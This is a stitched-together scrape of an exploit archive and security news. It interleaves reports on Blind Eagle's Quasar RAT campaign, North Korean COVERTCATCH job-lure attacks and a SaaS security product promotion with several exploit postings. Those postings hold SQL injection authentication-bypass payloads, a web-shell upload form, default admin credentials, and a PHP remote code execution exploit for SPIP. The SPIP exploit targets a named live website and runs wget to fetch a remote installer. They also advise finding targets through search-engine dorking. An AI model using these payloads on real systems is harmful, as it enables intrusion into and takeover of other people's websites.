Online Survey System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Online Survey System 1.0 auth by pass Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user&pass = ' or 0=0 ##[+] http://127.0.0.1/survey/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Survey System 1.0 SQL Injection

The Colombian insurance sector is the target of a threat actor tracked as Blind Eagle with the end goal of delivering a customized version of a known commodity remote access trojan (RAT) known as Quasar RAT since June 2024.
"Attacks have originated with phishing emails impersonating the Colombian tax authority," Zscaler ThreatLabz researcher Gaetano Pellegrino said in a new analysis published

Financial Security / Malware

The Colombian insurance sector is the target of a threat actor tracked as **Blind Eagle** with the end goal of delivering a customized version of a known commodity remote access trojan (RAT) known as Quasar RAT since June 2024.

"Attacks have originated with phishing emails impersonating the Colombian tax authority," Zscaler ThreatLabz researcher Gaetano Pellegrino said in a new analysis published last week.

The advanced persistent threat (APT), also known as AguilaCiega, APT-C-36, and APT-Q-98, has a track record of focusing on organizations and individuals in South America, particularly related to the government and finance sectors in Colombia and Ecuador.

The attack chains, as recently documented by Kaspersky, originate with phishing emails that entice recipients into clicking on malicious links that serve as the launchpad for the infection process.

The links, either embedded within a PDF attachment or directly in the email body, point to ZIP archives hosted on a Google Drive folder associated with a compromised account that belongs to a regional government organization in Colombia.

"The lure used by Blind Eagle involved sending a notification to the victim, claiming to be a seizure order due to outstanding tax payments," Pellegrino noted. "This is intended to create a sense of urgency and pressure the victim into taking immediate action."

The archive contains within it a Quasar RAT variant dubbed BlotchyQuasar, which packs in additional layers of obfuscation using tools like DeepSea or ConfuserEx to hinder analysis and reverse engineering efforts. It was previously detailed by IBM X-Force in July 2023.

The malware includes capabilities to log keystrokes, execute shell commands, steal data from web browsers and FTP clients, and monitor a victim's interactions with specific banking and payment services located in Colombia and Ecuador.

It also leverages Pastebin as a dead-drop resolver to fetch the command-and-control (C2) domain, with the threat actor leveraging Dynamic DNS (DDNS) services to host the C2 domain.

"Blind Eagle typically shields its infrastructure behind a combination of VPN nodes and compromised routers, primarily located in Colombia," Pellegrino said. "This attack demonstrates the continued use of this strategy."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Blind Eagle Targets Colombian Insurance Sector with Customized Quasar RAT

Designed to be more than a one-time assessment— Wing Security’s SaaS Pulse provides organizations with actionable insights and continuous oversight into their SaaS security posture—and it’s free!
Introducing SaaS Pulse: Free Continuous SaaS Risk Management 
Just like waiting for a medical issue to become critical before seeing a doctor, organizations can’t afford to overlook the constantly

SaaS Security / Risk Management

Designed to be more than a one-time assessment— Wing Security's SaaS Pulse provides organizations with actionable insights and continuous oversight into their SaaS security posture—and it's free!

****Introducing SaaS Pulse: Free Continuous SaaS Risk Management****

_Just like waiting for a medical issue to become critical before seeing a doctor, organizations can't afford to overlook the constantly evolving risks in their SaaS ecosystems. New SaaS apps, shifting permissions, and emerging threats mean risks are always in motion._

_SaaS Pulse makes it easy to treat SaaS risk management as an ongoing practice, not just an occasional check-up._

Security teams instantly get a real-time security "health" score, prioritized risks, contextualized threat insights, and the organization's app inventory—without setups or integrations.

****SaaS is a Moving Target****

SaaS stacks don't stand still. Business critical apps can easily slip into a state of vulnerability (i.e. supply chain attacks, account takeovers due to leaked credentials, misconfigurations, user access risks, and offboarding challenges). Relying on outdated point-in-time assessments leaves security teams blind to these shifts.

****Turn the Noise into Actionable Data****

What sets SaaS Pulse apart is its emphasis on making security insights simple, prioritized, and actionable— all with a click. It's designed for security teams who need answers fast:

*   **Dynamic Security Health Score:** Wing Security was the first in the industry to adapt the MITRE framework CWSS to SaaS security. This quantifiable language brings context, clarity, and focus, allowing for a proactive approach to prioritizing SaaS risks.
*   **Deep Shadow IT Discovery**: SaaS Pulse digs deep into every organization's SaaS stack to uncover shadow IT, risky permissions, and potential weaknesses— through a database of +350 K SaaS applications. Users get instant clarity on App2App connectivity, third-party risk management (TPRM), Gen-AI, compliance, and more.
*   **Contextual Threat Intelligence:** Users understand the "why" behind critical alerts through curated insights from expert threat intelligence analysts and automated contextual analysis - tailored for every SaaS environment.
*   **Prioritized SaaS risks:** Users get prioritized risks according to the severity level, helping security teams prioritize which risks to deal with first. SaaS Pulse monitors over 40 critical, complex vulnerabilities such as misconfigured apps, IAM inconsistencies, orphaned accounts or apps, and more.

With these features, and without complicated configurations or integrations, SaaS Pulse makes an indispensable FREE tool for continuous SaaS risk management.

****Get to the A-ha in a Click****

With a simple connection to core apps like Google Workspace and Microsoft 365, the system provides a comprehensive snapshot of the organization's SaaS security posture within minutes. SaaS Pulse continuously monitors the organization's environment, providing real-time visibility into emerging risks or major changes. Whether it's a sudden permission drift or a newly discovered shadow IT app, security teams are equipped with the insights they need to address these risks before they escalate.

****The High Cost of Ignoring SaaS Risks****

It's easy for risks to go unnoticed until it's too late. SaaS Pulse eliminates the need for sporadic assessments—through constant, automated monitoring, helping security teams avoid expensive breaches and data leaks. Managing SaaS environments manually (especially as they grow) becomes impossible—SaaS Pulse ensures no risk is overlooked, saving both time and potential losses.

****Prevent the Next Data Leak or Breach****

Wing Security's SaaS Pulse prioritizes visibility for overloaded security teams. SaaS Pulse isn't just a one-time SSPM tool; it's a continuous companion in maintaining good SaaS security hygiene. It provides a simple yet powerful way to stay on top of SaaS risks with automated, ongoing check-ins. For those who require more advanced capabilities, Wing Security's enterprise solution provides deeper insights, threat detection, automated remediation, and extensive monitoring to keep the organization secure. Learn more at https://wing.security/

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Wing Security SaaS Pulse: Continuous Security & Actionable Insights — For Free

Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation.

These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector.

"After an initial chat conversation, the attacker sent a ZIP file that contained

Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation.

These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector.

"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge," researchers Robert Wallace, Blas Kojusner, and Joseph Dobson said.

The malware functions as a launchpad to compromise the target's macOS system by downloading a second-stage payload that establishes persistence via Launch Agents and Launch Daemons.

It's worth pointing out that this is one of many activity clusters – namely Operation Dream Job, Contagious Interview, and others – undertaken by North Korean hacking groups that make use of job-related decoys to infect targets with malware.

Recruiting-themed lures have also been a prevalent tactic to deliver malware families such as RustBucket and KANDYKORN.

Mandiant said it observed a social engineering campaign that delivered a malicious PDF disguised as a job description for a "VP of Finance and Operations" at a prominent cryptocurrency exchange.

"The malicious PDF dropped a second-stage malware known as RustBucket which is a backdoor written in Rust that supports file execution."

The RustBucket implant is equipped to harvest basic system information, communicate with a URL provided via the command-line, and set up persistence using a Launch Agent that disguises itself as a "Safari Update" in order to contact a hard-coded command-and-control (C2) domain.

North Korea's targeting of Web3 organizations also go beyond social engineering to encompass software supply chain attacks, as observed in the incidents aimed at 3CX and JumpCloud in recent years.

"Once a foothold is established via malware, the attackers pivot to password managers to steal credentials, perform internal reconnaissance via code repos and documentation, and pivot into the cloud hosting environment to reveal hot wallet keys and eventually drain funds," Mandiant said.

The disclosure comes amid a warning from the U.S. Federal Bureau of Investigation (FBI) about North Korean threat actors' targeting of the cryptocurrency industry using "highly tailored, difficult-to-detect social engineering campaigns."

These ongoing efforts, which impersonate recruiting firms or individuals that a victim may know personally or indirectly with offers of employment or investment, are seen as a conduit for brazen crypto heists that are designed to generate illicit income for hermit kingdom, which has been the subject of international sanctions.

Notable among the tactics employed include identifying cryptocurrency-related businesses of interest, conducting extensive pre-operational research on their targets before initiating contact, and concocting personalized fake scenarios in an attempt to appeal to prospective victims and increase the likelihood of success of their attacks.

"The actors may reference personal information, interests, affiliations, events, personal relationships, professional connections, or details a victim may believe are known to few others," the FBI said, highlighting attempts to build rapport and eventually deliver malware.

"If successful in establishing bidirectional contact, the initial actor, or another member of the actor's team, may spend considerable time engaging with the victim to increase the sense of legitimacy and engender familiarity and trust."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams

Travel version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Travel v1.0 Remote File Upload Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://github.com/oretnom23/php-travel-agency-system                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .<form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data">   <label for="file">Upload File:</label>  <input type="file" id="file" name="file"><br><br>  <input type="submit" name="Fcuk Up" value="Fcuk Up"></form>[+] Go to the line 1.[+] Set the target site link Save changes and apply . [+] infected file : /tour/admin/operations/admin.php. [+] save code as poc.html .[+] Path : http://127.0.0.1/tour/admin/upload/webadmin.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Travel 1.0 Shell Upload

Webpay E-Commerce version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 Insecure Settings Vulnerability                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@admin.com & pass = password[+] https://www/127.0.0.1/demo/comdept.cmru.ac.th/59143214/admin/products.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Insecure Settings

SPIP version 4.2.12 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.12 PHP Code execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/fr_rubrique91.html                                                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 31 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?php<?phpclass indoushka {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }   private function generatePayload($payload) {    return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";}    public function exploit() {        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        $response = curl_exec($ch);        curl_close($ch);        echo "Exploit Sent! Response:\n";        echo $response;    }}$targetUrl = 'https://www.speleo-mandeure.fr/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("wget https://raw.githubusercontent.com/indoushka/Mari/master/install.php");'; // أوامر PHP التي تريد تنفيذها$exploit = new indoushka($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.12 Code Execution

Online Sports Complex Booking System version 1.0 suffers from an ignored default credential vulnerability.

**Online Sports Complex Booking System 1.0 Insecure Settings**

Posted Sep 6, 2024

Authored by indoushka

Online Sports Complex Booking System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 7ef39718e1694996d6c3234f87defd525659e7cde8353fa86e03c43c5fd1bf04

Download | Favorite | View

**Online Sports Complex Booking System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Online Sports Complex Booking System v1.0 Insecure Settings Vulnerability                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

Online Sports Complex Booking System 1.0 Insecure Settings

Online Shopping Portal Project version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Online Shopping Portal Project 2.0 auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2018/03/Online-Shopping-Portal-project-V2.0.zip                                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/shopping/ADMIN/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Shopping Portal Project 2.0 SQL Injection

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

**Online Pizza Ordering System 1.0 Insecure Settings**

Posted Sep 6, 2024

Authored by indoushka

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ea183be601d90798e6a525ee32f1811b36b16ef45e82b7172ff7fd9dada60b8e

Download | Favorite | View

**Online Pizza Ordering System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Pizza Ordering System v1.0 Insecure Settings Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

Tag

#google